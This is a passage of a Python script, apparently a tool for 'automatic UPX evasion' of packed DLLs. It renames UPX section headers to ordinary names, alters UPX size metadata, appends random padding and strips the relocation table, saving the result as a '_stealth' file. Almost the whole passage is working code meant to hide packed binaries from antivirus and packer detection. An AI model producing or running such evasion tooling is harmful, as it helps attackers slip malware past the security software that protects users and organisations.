size_of_optional_header = int.from_bytes(data[pe_offset + 20:pe_offset + 22], 'little')
section_table_offset = pe_offset + 24 + size_of_optional_header
replacements = {
b'UPX0': b'.text\x00\x00\x00',
b'UPX1': b'.data\x00\x00\x00',
b'UPX2': b'.rdata\x00\x00',
}
modified = False
for i in range(num_sections):
sec_offset = section_table_offset + i * 40
sec_name_raw = data[sec_offset:sec_offset + 8]
# Convert to immutable bytes for dict lookup
sec_name = bytes(sec_name_raw.split(b'\x00', 1)[0])
if sec_name in replacements:
new_name = replacements[sec_name]
old_name = sec_name.decode(errors='ignore')
print(f"[+] Section '{old_name}''{new_name.split(b'\x00')[0].decode()}'")
data[sec_offset:sec_offset + 8] = new_name
modified = True
if not modified:
print("[i] No UPX sections found maybe already renamed")
return data, modified
def tweak_upx_info_blocks(data: bytearray) -> bytearray:
for pos in range(len(data)-0x2000, 0x400, -4):
block = data[pos:pos+12]
if len(block) != 12 or block[0] >= 10:
continue
sz_packed = int.from_bytes(block[4:8], 'little')
sz_unpacked = int.from_bytes(block[8:12], 'little')
if 1000 < sz_packed < 50_000_000 and 1000 < sz_unpacked < 100_000_000:
tweak = random.randint(1, 7)
data[pos+4:pos+8] = (sz_packed + tweak).to_bytes(4, 'little')
data[pos+8:pos+12] = (sz_unpacked - tweak).to_bytes(4, 'little')
print(f"[+] Tweaked info block: packed +{tweak}, unpacked -{tweak}")
return data
print("[i] No info block tweaked")
return data
def add_padding(data: bytearray) -> bytearray:
import random
kb = random.randint(3, 15)
padding = bytearray(random.getrandbits(8) for _ in range(kb * 1024))
data.extend(padding)
print(f"[+] Added {kb} KB random overlay padding")
return data
def strip_relocations(data: bytearray) -> bytearray:
pe_offset = int.from_bytes(data[0x3C:0x40], 'little')
reloc_rva = int.from_bytes(data[pe_offset + 160:pe_offset + 164], 'little')
if reloc_rva != 0:
data[pe_offset + 160:pe_offset + 168] = b'\x00' * 8
print("[+] Stripped relocation table")
else:
print("[i] No relocations to strip")
return data
def main():
parser = argparse.ArgumentParser(description="Automatic UPX evasion")
parser.add_argument("input", help="UPX-packed DLL")
parser.add_argument("-o", "--output", help="Output filename")
parser.add_argument("--keep-relocs", action="store_true", help="Don't strip relocations")
args = parser.parse_args()
in_file = Path(args.input)
if not in_file.exists():
print(f"[-] File not found: {in_file}")
return
out_file = Path(args.output or f"{in_file.stem}_stealth{in_file.suffix}")
print(f"[*] Loading {in_file} ({in_file.stat().st_size // 1024} KB)")
data = bytearray(in_file.read_bytes())
print("[+] Applying evasion...")
data = modify_upx_magic(data)
data, _ = rename_upx_sections(data)
# data = tweak_upx_info_blocks(data)
data = add_padding(data)
if not args.keep_relocs:
data = strip_relocations(data)
out_file.write_bytes(data)
print(f"[+] Saved → {out_file} ({len(data)//1024} KB)")
if __name__ == "__main__":
main()